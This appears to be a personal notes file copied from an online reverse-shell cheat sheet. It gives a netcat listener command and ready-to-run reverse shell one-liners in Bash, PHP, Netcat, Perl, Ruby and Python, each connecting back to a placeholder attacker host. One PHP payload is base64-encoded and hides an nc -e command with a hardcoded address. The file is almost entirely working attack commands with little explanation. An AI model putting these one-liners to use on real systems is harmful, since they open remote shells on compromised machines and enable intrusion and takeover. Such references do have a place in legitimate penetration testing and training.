
######

https://highon.coffee/blog/reverse-shell-cheat-sheet/

#####

# in this type of vulnrabilities, the target gives the possibility to excute shells on the remote server 
# so one thing we can do is to initiate reverse shell back to me

#on my machine
$ nc -nvlp 80
-v, — verbose Set verbosity level (can be used several times); 
-l, — listen Bind and listen for incoming connections; 
-p, — source-port port Specify source port to use 		
#________________________________________________________________


#Bash Reverse Shells
exec /bin/bash 0&0 2>&0

0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

#________________________________________________________________

#PHP Reverse Shell
#A useful PHP reverse shell:

passthru("what ever you warnt");
passthru("nc -e /bin/sh ATTACKING-IP 80");

<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjAuMTIzIDQ0NDQ='));?>


php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or 6)
'''

#________________________________________________________________
#Netcat Reverse Shell
#Useful netcat reverse shell examples:

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80

#________________________________________________________________
#Perl Reverse Shell
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#Perl Windows Reverse Shell
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
#________________________________________________________________

Ruby Reverse Shell
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

#________________________________________________________________
#Python Reverse Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'